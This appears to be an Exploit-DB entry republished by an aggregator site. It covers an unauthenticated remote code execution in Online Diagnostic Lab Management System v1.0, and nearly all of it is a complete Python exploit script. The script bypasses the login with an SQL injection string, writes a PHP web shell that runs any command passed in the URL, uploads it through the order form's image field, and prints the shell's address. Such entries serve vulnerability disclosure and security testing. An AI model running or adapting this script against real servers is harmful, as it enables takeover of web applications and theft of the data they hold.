2

[webapps] Online Diagnostic Lab Management System v1.0 - Remote Code Execution (...

 1 year ago
source link: https://www.exploit-db.com/exploits/51045
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Online Diagnostic Lab Management System v1.0 - Remote Code Execution (RCE) (Unauthenticated)

EDB-ID:

51045

EDB Verified:

Platform:

PHP

Date:

2023-03-25

Vulnerable App:

# Exploit Title: Online Diagnostic Lab Management System v1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Google Dork: N/A
# Date: 2022-9-23
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
# Vendor Homepage: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/diagnostic_0.zip
# Tested on: windows 11 - XAMPP
# Version: 1.0
# Authentication Required: bypass login with sql injection

#/usr/bin/python3

import requests
import os
import sys
import time
import random

# clean screen
os.system("cls")
os.system("clear")

logo = '''
##################################################################
#                                                                                                                                            #
#    Exploit Script ( Online Diagnostic Lab Management System )                             #
#                                                                                                                                            #
##################################################################
'''
print(logo)

url = str(input("Enter website url : "))
username = ("' OR 1=1-- -")
password = ("test")

req = requests.Session()

target = url+"/diagnostic/login.php"
data = {'username':username,'password':password}

website = req.post(target,data=data)
files = open("rev.php","w")
payload = "<?php system($_GET['cmd']);?>"
files.write(payload)
files.close()

hash = random.getrandbits(128)
name_file = str(hash)+".php"
if "Login Successfully" in website.text:

    print("[+] Login Successfully")
    website_1 = url+"/diagnostic/php_action/createOrder.php"

    upload_file = {
        "orderDate": (None,""),
        "clientName": (None,""),
        "clientContact" : (None,""),
        "productName[]" : (None,""),
        "rateValue[]" : (None,""),
        "quantity[]" : (None,""),
        "totalValue[]" : (None,""),
        "subTotalValue" : (None,""),
        "totalAmountValue" : (None,""),
        "discount" : (None,""),
        "grandTotalValue" : (None,""),
        "gstn" : (None,""),
        "vatValue" : (None,""),
        "paid" : (None,""),
        "dueValue" : (None,""),
        "paymentType" : (None,""),
        "paymentStatus" : (None,""),
        "paymentPlace" : (None,""),
        "productImage" : (name_file,open("rev.php","rb"))
        }

    up = req.post(website_1,files=upload_file)
    print("[+] Check here file shell => "+url+"/diagnostic/assets/myimages/"+name_file)
    print("[+] can exect command here => "+url+"/diagnostic/assets/myimages/"+name_file+"?cmd=whoami")
else:
    print("[-] Check username or password")

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK